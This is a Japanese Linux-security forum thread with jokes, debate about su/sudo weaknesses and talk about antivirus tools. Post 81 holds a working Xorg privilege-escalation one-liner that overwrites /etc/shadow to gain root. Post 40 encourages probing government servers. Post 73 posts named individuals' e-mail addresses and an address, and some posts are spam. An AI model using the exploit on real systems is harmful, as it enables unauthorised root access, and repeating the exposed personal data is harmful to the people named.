Linuxセキュリティ総合スレ
1 :login:Penguin :2016/06/12(日) 23:17:47.19 ID:OMH3td/9.net Linuxを安全に使うためにセキュリティについて語りましょう!
2 :login:Penguin :2016/06/12(日) 23:38:08.55 ID:yP8FUEwn.net インターネットに繋がない
3 :login:Penguin :2016/06/13(月) 06:09:27.32 ID:eDU8tci1.net 電源を入れない
4 :login:Penguin :2016/06/13(月) 10:29:04.09 ID:Oh9pGuME.net 気にしない
5 :login:Penguin :2016/06/13(月) 11:01:38.26 ID:2M58TAyx.net SAKOKU を使う
6 :login:Penguin :2016/06/13(月) 11:57:17.29 ID:J1aqrsrp.net 勝つためには戦わないこと(´・ω・`)
7 :login:Penguin :2016/06/13(月) 12:21:18.30 ID:8nJEuh/y.net 手始めにiptableから乗り換える話書けや
8 :login:Penguin :2016/06/13(月) 15:37:47.75 ID:0TZsX1cx.net セキュリティ総合ってことはウィルス対策もここでいいよね?
9 :login:Penguin :2016/06/13(月) 20:14:08.76 ID:4q925383F Snortを導入する!ただホワイトリスト作るのめっちゃしんどい
10 :login:Penguin :2016/06/13(月) 20:55:43.29 ID:j5ciL7QT.net そもそもLinux使うこと自体が対策に成り得る
11 :login:Penguin :2016/06/13(月) 22:05:23.35 ID:Qr5Zi0oD.net サイバーノーガード戦法だ
12 :login:Penguin :2016/06/13(月) 22:14:04.99 ID:K9ELyhAn.net nftの情報仕入れることを期待してたんだけど、セキュリティのスレなのな。 最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。
13 :login:Penguin :2016/06/13(月) 22:30:22.37 ID:THPCncF9.net 重複 http://hayabusa6.2ch.net/test/read.cgi/linux/1150732249/
14 :login:Penguin :2016/06/13(月) 22:50:37.82 ID:4q925383F FWのログ、数秒間に30個ぐらい色んなDNSサーバにアクセスしてるのを結構見るんだけど、 あらかじめ設定しておいたプロバイダのDNSサーバに問い合わせるだけじゃダメなん?
15 :login:Penguin :2016/06/20(月) 09:45:44.94 ID:EE0G5RY5.net UACが欲しい(´・ω・`)
16 :login:Penguin :2016/06/27(月) 21:17:47.20 ID:1MSZfZlD.net 代わりにキーリングをあげよう
17 :login:Penguin :2016/07/08(金) 22:16:34.93 ID:nKTBpDXx.net ぱんつくれ !
18 :login:Penguin :2016/07/11(月) 20:45:28.85 ID:1UAhQw4h.net (´・ω・`)・ω・`) キャー / つ⊂ \ 怖いー
19 :login:Penguin :2016/07/16(土) 12:23:29.36 ID:az2Lvjtg.net make pan
20 :login:Penguin :2016/07/28(木) 14:39:09.27 ID:vgMn1AfM.net 残念ながらいくつかの解決が困難な問題のせいで今やUnix/LinuxよりWindowsのほうが遥かにセキュアだからな。 被害が少ないのはただ単に狙われてないからってだけ。 1.su/sudoが糞 glibcの脆弱性GHOSTの発見に関わった人のコメント http://www.openwall.com/lists/owl-users/2004/10/22/2 > If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself. > [1] Such a compromise could occur in a variety of ways: Web/FTP/etc. > client vulnerabilities, password snooping, etc. > [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program. http://www.openwall.com/lists/owl-users/2004/10/20/6 > unfortunately both su and sudo are subtly but fundamentally flawed. > So the separation between the non-root and the root accounts is lost. suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。 次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。 結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。
21 :login:Penguin :2016/07/29(金) 08:18:56.26 ID:3v5CyHDC.net じゃけんSELinux使いましょうね
22 :login:Penguin :2016/07/29(金) 11:43:36.67 ID:c3kWqYGY.net セキュリティ対策がはっきりしない以上Win使いしかいない でもw10こわいわー
23 :login:Penguin :2016/07/29(金) 12:00:07.41 ID:r5rsVV/0.net >>20 侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。
24 :login:Penguin :2016/07/29(金) 15:11:35.83 ID:2cIkyZpH.net >>23 今の時代は「侵入された時点でおしまい」が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ「普段非rootでログインして必要な時だけsu/sudoでrootになって実行する」 っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか? もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが そのあたりをきちんと理解しないで「Unix/LinuxはWindowsよりセキュアなんですーー」で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して「異アカウント間の分離」を破壊しないように考慮したり、 ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>21 の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した 一方残念ながら思考停止したUnix/Linuxは、権限を得るために「何の保護もない環境」から実行される「何の保護もされてないsu/sudoコマンド」に対して「何の保護もされてない状態でパスワードを入力する事」状態が放置され、 その一番基本的な「異アカウント間の分離」すら無意味になってる体たらく 結果的に「(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい」になってるので、一周回ってお前の言ってることも正解なわけだがな
25 :login:Penguin :2016/07/29(金) 15:40:50.53 ID:2cIkyZpH.net 一応フォローしとくとLinux kernel自体は割ときちんと進化してるな、NXとかASLRとかYamaとかLSMとか きちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが
26 :login:Penguin :2016/07/29(金) 16:57:07.30 ID:AresjTJd.net うんそれはご説ごもっともなんだけどさ、ただ危ないぞって騒ぐだけじゃなくて被害に遭った卑近な例とか挙げられないのかな? 卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。 xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。 だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。 開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ? LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの?対策を示すとか何かしない限り。 まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。
27 :login:Penguin :2016/07/29(金) 17:23:02.18 ID:2cIkyZpH.net >>26 俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・`)
28 :login:Penguin :2016/07/29(金) 17:53:59.24 ID:53ApPnD4.net windowsが仮に安全つうのは あることするには続きは窓操作も必要だからじゃね?(あるいは暗号のようなパス書かないと辿れないとか) そういう不便さを有難くセキュリティーが強いというのかどうか
29 :login:Penguin :2016/07/29(金) 19:36:23.87 ID:IWyIiLvv.net Windowsがセキュリティーを確保しているのは専業のベンダー各社が競争に晒されながら製品を開発しているからであって、Windows自身が特段セキュリティに優れる訳じゃない
30 :login:Penguin :2016/07/29(金) 21:02:48.88 ID:2cIkyZpH.net https://blog.martin-graesslin.com/blog/2015/11/looking-at-the-security-of-plasmawayland/ KDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる
31 :login:Penguin :2016/07/30(土) 13:47:31.26 ID:m4BHHueF.net 強制アクセス制御だけでハッキングを防御できるの?できないの? それと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの?
32 :login:Penguin :2016/07/30(土) 13:54:08.97 ID:m4BHHueF.net Linuxなんてのは宮大工が構築した接ぎ木細工のようなもの。 ノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。 (肝心な釘打ち無しで構築してるもんだから) Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。 但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、 まあ、他人ごとでどうなろうが知ったことじゃないが…
33 :login:Penguin :2016/08/13(土) 02:05:03.68 ID:oD+tGgzq.net LinuxのTCPに脆弱性、トラフィックを乗っ取られる恐れ http://www.itmedia.co.jp/enterprise/articles/1608/12/news047.html
34 :login:Penguin :2016/08/13(土) 04:51:41.40 ID:aN9vHd6i.net >>33 すぐ更新されるから慌てなさんな
35 :login:Penguin :2016/08/13(土) 08:48:05.17 ID:TXBKXjH8.net >>34 2012年からあった脆弱性がすぐに修正されるの?
36 :login:Penguin :2016/08/13(土) 08:55:27.99 ID:1K0xoI1z.net すでにパッチは出ているぞい
37 :login:Penguin :2016/08/13(土) 11:19:12.09 ID:UrcrvCqb.net 大して重要じゃないと思われてたから放置されてただけで、 修正が難しいわけじゃないのだろう。
38 :login:Penguin :2016/08/14(日) 13:17:03.39 ID:gduCaAAf.net 「誰も気づかなかったけど2012年からひっそり存在していた物が今発見されてすぐに修正された」 だろ
39 :login:Penguin :2016/08/14(日) 14:21:25.00 ID:IM019vfG.net 日本の官公庁のサーバのセキュリティってまともなの?
40 :login:Penguin :2016/08/14(日) 18:52:10.23 ID:fe3iWrgq.net >>39 自分で確認したら?ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。 官公庁はWindows serverじゃないの?
41 :login:Penguin :2016/09/03(土) 02:42:39.64 ID:T3i7Gd65.net アグレックスって その13 なんで飲み行かないの? なんで女の子誘って飲みに行かないの? 声掛けないと飲みいけないのに。 話しないと恋は始まらないよ。 声掛けないとSEXもさせてくれないのに。 声掛けないから、 ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。 女の子誘って飲みにきなよ。 女の子に声掛けないと、恋も出来ないよ。 SEXしたかったら、声掛けて飲みに行きなよ。 残業してる間に、持っていかれちゃってるよ。 後ろから見たら、がに股になってる女の子見たことない? SEXしたかったら、なんでもいいから声掛けて飲みに行きなよ。 残業しても恋はできないよ。SEXできないよ。 恋をしなけりゃ、SEXはさせてもらえない。 恋をするには、話して気に入ってもらうしかない。 気に入ってもらうには、飲み行くのが近道だろ。 別に会議で、大きな事言ってもいいけど。 どうせSEX出来るまで何度も繰り返すんだろうから、 そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。 そんなだったら、飲みに行くのが一番だろ。 別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。 ばれたとき、周りの目が厳しいぞ。 お前が呼ばないから、ほらみろ可愛い子はみんなやられて。 残っているのはブスばかりになってるじゃないか。 ブスはキツイぞ。 誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。
42 :login:Penguin :2016/09/06(火) 16:46:15.64 ID:vVf8gi4f.net clamAVでは不安だお(´・ω・`)
43 :login:Penguin :2016/09/06(火) 22:53:44.42 ID:TopTMWtn.net >>42 なんでよ?シスコ様だぞ?
44 :login:Penguin :2016/09/07(水) 07:09:59.88 ID:O110MSh/.net 常駐じゃないと安心できないマン
45 :login:Penguin :2016/09/13(火) 10:37:58.85 ID:g0CBlyhH.net 常駐か駐留か進駐か それが問題である
46 :login:Penguin :2016/09/17(土) 18:12:13.92 ID:9GLGaOH4.net ギブミーチョコレート
47 :login:Penguin :2016/09/29(木) 12:32:01.60 ID:ZwQJlT8x.net 尻|ω゚ )┻┛身動きとれんのだが・・・
48 :login:Penguin :2016/09/29(木) 12:44:59.58 ID:5wiRFmuo.net NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
49 :login:Penguin :2016/09/29(木) 12:54:29.04 ID:lvJNOdKb.net 最強のiptablesの設定をうぷしてくれる神いないの?
50 :login:Penguin :2016/09/29(木) 20:57:19.24 ID:SWTYFo2r.net firewalldに乗り換えれ
51 :login:Penguin :2016/10/04(火) 17:05:57.73 ID:ZgAPWl/3.net >>50 乗り換えると最強になるの?
52 :login:Penguin :2016/10/04(火) 21:10:03.74 ID:MfnjwfuN.net 設定が簡単になるから、「設定をうぷしてくれ」とは思わなくなる
53 :login:Penguin :2016/10/23(日) 10:01:10.29 ID:PWQ2IPcX.net >>52 出て行く通信のフィルタを書くためには 結局IPTABLES書かなきゃいけないのはなおった? なおったなら乗り換える。
54 :login:Penguin :2016/11/30(水) 12:37:43.41 ID:SfHGIzEu.net ∧,,,∧ (´・ω・) < おっかのうえひっなげしのはぁながぁぁ 〜 (U ) `u-u´
55 :login:Penguin :2017/01/20(金) 17:47:06.69 ID:OITYnSWZ.net ___ (\ ∞ ノ ヽ)_ノ 迫る〜パンチ〜〜♪ (=O┬O ◎-ヽJ┴◎ キキ〜  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
56 :login:Penguin :2017/02/01(水) 08:09:39.67 ID:gwo76No6.net .γ ⌒ ヾ (´・ω・`) 迫る〜ハゲッ♪ (=O┬O ◎-ヽJ┴◎ キキ〜  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
57 :login:Penguin :2017/02/13(月) 20:59:43.28 ID:aKHZLuDZ.net 顔がでかいなぁ・・・
58 :login:Penguin :2017/03/08(水) 21:47:52.30 ID:TuQ4x/Y7.net ∧_∧ .ミ,,・_・ミ 迫る〜ハゲッ♪ (=O┬O ◎-ヽJ┴◎ キキ〜  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
59 :login:Penguin :2017/04/19(水) 13:43:38.91 ID:kexeXY6M.net (´・ω・´・ω・ω・`)知らんがなトリオ
60 :login:Penguin :2017/04/28(金) 16:59:33.55 ID:ZiXyj8JT.net Linuxの方がWindowsよりもセキュアだっていうのは 過去の話なんすね。それなのに未だにLinuxを 安全って紹介してる所ばかりなのは何でですかね
61 :login:Penguin :2017/04/30(日) 00:21:15.39 ID:zhwkJ+1u.net Linuxで被害出たという報告は少ないでしょ Windowsでは散々あるけど
62 :login:Penguin :2017/04/30(日) 00:36:51.26 ID:3yi8UZQK.net 使う奴のスキル/知識レベル次第だから、OSが解決できる問題じゃないよ
63 :login:Penguin :2017/04/30(日) 14:38:15.54 ID:6nvs6+SR.net んだんだ !
64 :login:Penguin :2017/04/30(日) 19:21:48.33 ID:K1kIRV9a.net clamとかselinuxとか、皆さん使っていますか? マシンの使用用途によりけりだとは思いますが、 僕の自宅鯖はfail2banだけです。 有用な物や便利な物があれば教えて欲しいです。
65 :login:Penguin :2017/05/09(火) 10:29:04.72 ID:6kIUOBHa.net 他人のサーバ管理してるけど、 今までosの脆弱性突かれてどうこうてのは 無いなあ 過去10年起きたのは、全てユーザーの問題 クソみたいなパスワード突破されたとか、 ゴミみたいなコードからのインジェクションとかのみ
66 :login:Penguin :2017/06/16(金) 09:15:27.82 ID:Cv6QgGNP.net 今年も夏を乗りきれず逝く小型PCがいるのでしょうね
67 :login:Penguin :2017/06/16(金) 09:16:10.27 ID:Cv6QgGNP.net 誤爆失礼
68 :login:Penguin :2017/07/03(月) 23:36:13.34 ID:cDHqg+NI.net openssl enc -e -aes256 で暗号化してたファイルが、急に、 openssl enc -d 〜 で開けなくなりました。 ファイルが壊れたかとめちゃくちゃ焦ったけど、 タイムスタンプは去年のまま変化なし。 本家から、1.0.2lを落としてコンパイルした実行ファイルからだと 問題なく開けたからファイルの問題ではない模様。 1.1.0のバグですか? #確か2ヶ月前ぐらいだとパッケージインストールされている 1.1.0系でも問題なかったはずですが。 linux-mint(ubuntu16.04)です。
69 :login:Penguin :2017/07/04(火) 01:23:11.94 ID:RdyHvcf/.net >>68 くだらねえ質問はここに書き込め!Part 228 http://hayabusa6.2ch.net/test/read.cgi/linux/1494314571/ で聞いたほうが良いと思う
70 :66 :2017/07/05(水) 00:22:13.88 ID:uEgHtGC3.net >69 ありがとう。 次回からそうするわ。 ちなみに、今回のは下記参考に自己解決したっぽい。 -md md5付けたら、現行1.1.0でもファイル開けました。 https://github.com/fastlane/fastlane/issues/9542 https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant
71 :login:Penguin :2017/09/07(木) 19:37:24.22 ID:NhVQ+S22.net すまん誰か教えてくれ! 全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、 設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?
72 :login:Penguin :2017/10/16(月) 19:17:31.78 ID:AvEU8VfP.net 。o0○( zzzz… ) _,,..,,,,_ / ,' 3/⌒ヽ-、_ /l. /____/  ̄ ̄ ̄ ̄ ̄ ̄ ̄
73 :login:Penguin :2017/11/03(金) 21:09:20.77 ID:UMEHXcXh.net 【 日立製作所 】焦土戦 セキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。 新名主 隆志 TIS shimmyozu.takashi@technopro.com 色田 眞吾 日立製作所 Shikita.Shingo@technopro.com 八木 一暢 TIS yagi.kazunobu@technopro.com 水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com 佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com 佐々木 健太 日立製作所 sasaki.kenta@technopro.com 中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com 永井 真祐子 富士ソフト nagai.mayuko@technopro.com 品川区高輪3-25-33 都内のトイレに花子さんだ 日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。
74 :login:Penguin :2017/12/29(金) 13:14:18.48 ID:S/CsVkMC.net 誰でも簡単にパソコン1台で稼げる方法など 参考までに、 ⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。 グーグル検索⇒『宮本のゴウリエセレレ』 HRT6GIPYTB
75 :login:Penguin :2018/04/11(水) 07:03:34.17 ID:9VtMkuZE.net 。o0○( zzzz… ) _,,..,,,,_ / ,' 3/⌒ヽ-、_ /l. /____/  ̄ ̄ ̄ ̄ ̄ ̄ ̄
76 :login:Penguin :2018/05/22(火) 11:10:27.97 ID:Czl6p0FW.net 僕の知り合いの知り合いができた副業情報ドットコム 関心がある人だけ見てください。 グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』 BTBIK
77 :login:Penguin :2018/05/26(土) 09:20:44.99 ID:c6Ml0Dod.net 【緊急】LinuxベースのルーターやNASに感染するマルウェア「VPNFilter」、54カ国50万台に感染か http://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50
78 :login:Penguin :2018/05/26(土) 12:43:59.58 ID:H0+abEbN.net 大問題じゃないか
79 :login:Penguin :2018/05/27(日) 16:31:34.31 ID:QzfBv+yQ.net Windowsのセキュリティにはうるさい犬厨もそっ閉じ。つまり、犬問題w
80 :login:Penguin :2018/07/08(日) 20:50:42.96 ID:QTYf4jMn.net 。o0○( zzzz… ) _,,..,,,,_ / ,' 3/⌒ヽ-、_ /l. /____/  ̄ ̄ ̄ ̄ ̄ ̄ ̄
81 :login:Penguin :2018/10/31(水) 11:46:41.86 ID:XLo7vX23.net suid付きXorgを使ったroot昇格法 https://www.exploit-db.com/exploits/45697/ cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su xorgはフォントパスのリストをそのままログに書き込むことを利用してる (shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)
82 :login:Penguin :2019/03/10(日) 12:39:41.95 ID:BHkfBLF0.net i"\ )) | 8 ) ∧,,,∧∩-''" _ ..(´・ω・`)彡 おぱんつ おぱんつ ! ! 〃(\ ∞ ,⊂彡 `ヽ)_ノ| | し⌒J
83 :login:Penguin :2019/05/24(金) 01:31:09.68 ID:WQ5DwMzT.net 彡⌒ ミ ( ´ ・ω・) 呼んだ ?
84 :login:Penguin :2019/05/31(金) 12:30:43.06 ID:bdQbsGXY.net Linuxを狙うマルウェア「HiddenWasp」に注意 2019/05/31 06:55 後藤大地 https://news.mynavi.jp/article/20190531-833791/ Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を 発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。 このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。 ・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に リモートコントロールするために開発されている ・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が 高い ・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア から大量のソースコードが流用されている ・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能 性が低いと見られる Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が 低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、 注意が必要。
85 :login:Penguin :2019/06/01(土) 00:37:42.11 ID:/N3jDoCj.net >>84 これはひどい 俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、 Linuxにはこれがないからな SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?) RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?
86 :login:Penguin :2019/06/01(土) 03:51:20.70 ID:BeN0lDY7.net Linuxだから安全です。
87 :login:Penguin :2019/06/01(土) 08:23:33.96 ID:0WGBvA8D.net ウィルス検体を各所に送り対応が早いとこは半日だったが ノートンは3日後だったことがあった
88 :login:Penguin :2019/06/01(土) 23:05:01.15 ID:aQmSSgBv.net >>85 毎日更新してるんじゃないかな ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。
89 :83 :2019/06/02(日) 01:29:08.34 ID:Zexh2AIq.net $ sudo /opt/sophos-av/bin/savupdate 次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63 Updating Sophos Anti-Virus.... Updating SAVScan on-demand scanner Updating Virus Engine and Data Updating Manifest Update completed. 次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63 sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました $ sudo /opt/sophos-av/bin/savdstatus --version Copyright 1989-2018 Sophos Limited. All rights reserved. Sophos Anti-Virus = 9.15.1 ビルドのリビジョン = 2793374 脅威検出エンジン = 3.74.2 脅威データ = 5.63 検出脅威数 = 35620036 脅威データリリース日 = 2019年05月07日 00時00分00秒 前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒 と脅威データリリース日がずっと5/7のままなんだよね これでも最悪1日毎には更新してるのかね? ノートンだと1時間に1回は更新してるっぽいけど 更新しててくれてると助かるのだが
90 :83 :2019/06/02(日) 01:30:11.25 ID:Zexh2AIq.net >>87-88 へね
91 :83 :2019/06/03(月) 00:52:09.01 ID:LINEVdyy.net >>87-88 ここ見たらやはり1日1回ぐらいは更新されてそう 実際俺のSophosは普通に6/2更新されてた どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と ウイルス定義ファイル更新日は違うらしい ウイルス定義ファイル更新日もちゃんと書けよ>Sophos Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法 https://community.sophos.com/kb/ja-jp/121984
92 :login:Penguin :2019/06/03(月) 02:02:29.21 ID:jJq3PPoG.net 野良アプリをたくさん入れるWindowsではウイルス検知ソフトが不可欠だね。
93 :login:Penguin :2019/06/03(月) 02:06:37.36 ID:jJq3PPoG.net しかし、経験上、ウイルス検知ソフトはそれほど当てにできない。 世に知れ渡っていないウイルスが仕込まれていた場合に ウイルス検知ソフトがそれを正しく検出してくれることはまれ。 何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。 でもダウンロードあと、そこまで待ってインストールする人はいない。
94 :login:Penguin :2019/06/03(月) 08:05:48.00 ID:eMJGOUo4.net >>84 これの元記事によるとvirustotalで引っかからない https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png つまりノートンだろうが何だろうが脅威としないで放置されるということ 感染経路はわからんが野良危険ということだろう
95 :login:Penguin :2019/06/03(月) 22:51:46.35 ID:sgwkICkl.net >>84 これは具体的にどう注意したらいいんだ?
96 :83 :2019/06/03(月) 22:56:08.11 ID:LINEVdyy.net やはり、Sophosのウイルス定義ファイル更新は1日1回はあるな ↓となってるから(途中に更新あったかは知らんが多分ないだろ) 昨日 <published>2019-06-02T13:03:35</published> 今日 <published>2019-06-03T13:07:34</published>
97 :login:Penguin :2019/06/04(火) 11:45:07.22 ID:JnEdCGFR.net ソフォス個人情報入れないとダウン出来ないの?
98 :83 :2019/06/04(火) 23:57:45.16 ID:8eAlB9kG.net >>97 全部、適当に入れればいいよ メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫
99 :login:Penguin :2019/06/05(水) 09:35:56.10 ID:2u//H+UO.net 電話番号とか住所も?
100 :login:Penguin :2019/06/05(水) 21:45:09.38 ID:1PL8mpQb.net 電話番号、住所って書く欄あったっけ? あったとしても、100%適当で通るよ 役職・法人名も適当でおk 国、県、郵便番号は日本、東京、1000000でおk ちなみにLinux版はこれね https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ
101 :login:Penguin :2019/06/06(木) 13:34:15.13 ID:Vt0/9sNy.net >>100 都道府県がなぜか受け付けてくれない
102 :login:Penguin :2019/06/06(木) 20:22:08.58 ID:yFuR+pcY.net >>101 先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ 国名: 日本 都道府県:Tokyo 郵便番号:100-0000 で大丈夫だよ
103 :login:Penguin :2019/06/07(金) 09:06:17.12 ID:boyNvVP0.net >>102 ▲▼が出てこない
104 :login:Penguin :2019/06/07(金) 20:09:33.53 ID:/Sk2vmHZ.net ブラウザでsophos.comのCookeiとJavaScriptオンにしないとだめだよ オフになってるんじゃない?
105 :login:Penguin :2019/06/07(金) 21:33:16.30 ID:yVEJ6IS3.net Symantec Endpoint ProtecitonmpLinux用クライアントをインストールしてみたんだが、あかんファイルは警告無く消し、しかも事後報告が無いのな これはちと使えないわ
106 :login:Penguin :2019/06/07(金) 23:40:08.48 ID:/Sk2vmHZ.net Symantecのって無料版あったっけ?
107 :login:Penguin :2019/06/08(土) 02:35:25.81 ID:/huWGbTD.net Symantec Endpoint Protection for linux良さそうだが、 1年間9500円アップグレード4700円って高いな ライセンスだけでメンテナンス不要版もあるの? 値段はここの43ページ https://www.symantec.com/content/ja/jp/micro_partner/Sales_guide_SEPSPS_14_2013Feb.pdf
108 :login:Penguin :2019/06/10(月) 15:44:13.86 ID:9N/TTeW/.net LinuxでUEFIスキャナーがついたアンチウィルスソフトってありますか? ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。 UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。 オープンソースで誰か作ってくれないかな・・・
109 :login:Penguin :2019/06/18(火) 02:35:54.34 ID:AVJfVicP.net マイクロソフト、Azure顧客にEximワームに注意を呼びかけ Catalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分 https://japan.zdnet.com/article/35138550/ Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の Azureも影響を受けるとしてAzure顧客向けに警告を出した。 このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、 CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用 されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る ことができるというものだ。 ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を 広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。 Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし 送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。 Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を 敷いているとMicrosoftは述べている。(後略)
